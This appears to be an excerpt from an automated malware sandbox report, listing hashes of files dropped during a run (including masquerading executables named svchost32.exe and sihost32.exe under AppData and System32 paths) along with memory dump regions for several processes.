| MD5 | ba169f4dcbbf147fe78ef0061a95e83b |
| SHA1 | 92a571a6eef49fff666e0f62a3545bcd1cdcda67 |
| SHA256 | 5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1 |
| SHA512 | 8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c |
memory/532-73-0x0000000006B40000-0x0000000006B72000-memory.dmp
memory/532-74-0x0000000070C90000-0x0000000070CDC000-memory.dmp
memory/532-84-0x0000000006D80000-0x0000000006D9E000-memory.dmp
memory/532-85-0x0000000006DA0000-0x0000000006E43000-memory.dmp
memory/532-86-0x0000000007510000-0x0000000007B8A000-memory.dmp
memory/532-87-0x0000000006ED0000-0x0000000006EEA000-memory.dmp
memory/532-88-0x0000000006F40000-0x0000000006F4A000-memory.dmp
memory/532-89-0x0000000007160000-0x00000000071F6000-memory.dmp
memory/532-90-0x00000000070D0000-0x00000000070E1000-memory.dmp
memory/532-91-0x0000000007110000-0x000000000711E000-memory.dmp
memory/532-92-0x0000000007120000-0x0000000007134000-memory.dmp
memory/532-93-0x0000000007200000-0x000000000721A000-memory.dmp
memory/532-94-0x0000000007150000-0x0000000007158000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 968cb9309758126772781b83adb8a28f |
| SHA1 | 8da30e71accf186b2ba11da1797cf67f8f78b47c |
| SHA256 | 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a |
| SHA512 | 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3 |
memory/3624-108-0x00000000060D0000-0x0000000006424000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a9eefee1cdccd47459b474fa81f53ef6 |
| SHA1 | c719b583efed694615235819161879cc36a45aff |
| SHA256 | c99bc609a9b7674042b44889a0b498556f1c3fb45125d6452a4e983fdeaa3982 |
| SHA512 | d76c1bcb6f79fcccefe887a663333e2f9b4d2affaa12a381bda408593938148ad64d74b22ea94ffe3e70cc61b44f9a4d6d82a73bfe8f2871bd20c5a3bb2ed2ea |
memory/3624-110-0x0000000070C90000-0x0000000070CDC000-memory.dmp
memory/1236-121-0x00007FFF46493000-0x00007FFF46495000-memory.dmp
memory/1236-122-0x00007FFF46490000-0x00007FFF46F51000-memory.dmp
memory/1236-125-0x00007FFF46490000-0x00007FFF46F51000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\svchost32.exe
| MD5 | 0a36dbea88311baeb376ff6fb3ea0a3a |
| SHA1 | 100d0b18060351080e63c3e920017056bc6ad9ee |
| SHA256 | a3d218dbf74614c2beacec478f3d04160e2757022303a105c6a7fe25d044ff6b |
| SHA512 | ad329ddc01dfd4137964aab22de4471f687e44fe2bce98e1efce04f70074d38ba650d59b33fa8430035c54be401f4f751ea94b5ef0ccf60e6b0eb24d816087d8 |
memory/3652-129-0x0000000000D40000-0x0000000000F2A000-memory.dmp
memory/3652-130-0x0000000001900000-0x0000000001912000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\mbuilder.exe.log
| MD5 | 28d7fcc2b910da5e67ebb99451a5f598 |
| SHA1 | a5bf77a53eda1208f4f37d09d82da0b9915a6747 |
| SHA256 | 2391511d0a66ed9f84ae54254f51c09e43be01ad685db80da3201ec880abd49c |
| SHA512 | 2d8eb65cbf04ca506f4ef3b9ae13ccf05ebefab702269ba70ffd1ce9e6c615db0a3ee3ac0e81a06f546fc3250b7b76155dd51241c41b507a441b658c8e761df6 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 9b80cd7a712469a4c45fec564313d9eb |
| SHA1 | 6125c01bc10d204ca36ad1110afe714678655f2d |
| SHA256 | 5a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d |
| SHA512 | ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 07a771c4f31f62b2d04e2befaa36dce7 |
| SHA1 | 662952ede6c1acbb575e8149a5ac2f08edade811 |
| SHA256 | a2df2570980e1123d9af8e12a27a82d3a4d332f0e7dd44e4e225743207c099b3 |
| SHA512 | 9e339a2d0bfaf5bbe5252f69061652c5880fe1233930830ca7190a65516366e05129907b1656a6790c0093ad82ac73ddee6738d0b78ecb1e3d888f467b889fe9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e5663972c1caaba7088048911c758bf3 |
| SHA1 | 3462dea0f9c2c16a9c3afdaef8bbb1f753c1c198 |
| SHA256 | 9f7f29a4696876cadca3f14d7e43f9ede0c97fd64be3f5d94bda49a91b6a419e |
| SHA512 | ff4e72c46cf083de62baa2ce2661555dd91b5f144294015f7b262fd4500cb67fe80e1871a82da63b607e3e9cef401f4b73c587bf1134637881ecad51aad1eddc |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost32.exe.log
| MD5 | b245679121623b152bea5562c173ba11 |
| SHA1 | 47cb7fc4cf67e29a87016a7308cdb8b1b4dc8e3d |
| SHA256 | 73d84fd03e38f1bbf8b2218f8a454f0879051855252fc76b63f20f46e7fd877f |
| SHA512 | 75e46843b1eafcc7dc4362630838895b7f399e57662a12bf0305a912c8e726b02e0a760b1b97a2c262b2d05fdb944b9ed81c338ad93e5eb5cb57bc651602e42c |
C:\Windows\System32\Microsoft\Telemetry\sihost32.exe
| MD5 | ecd7d7be630be740725bb52e73dafec0 |
| SHA1 | 7def3f5a97ffbd07ad81357262b0c0b49859276d |
| SHA256 | 76b4687442dd515b5e7399abb4a4f603b0634c37ff6b47ed51efae68e0d71706 |
| SHA512 | 412d282c9018c909ea15f6aa2f1651eb4f46ed332b6084f17b58ada74b685a1d357cc71debed5b027973e84760cb6f2d7acd0e759e5850f7c261af472b3bab45 |
memory/4860-197-0x0000000000520000-0x0000000000526000-memory.dmp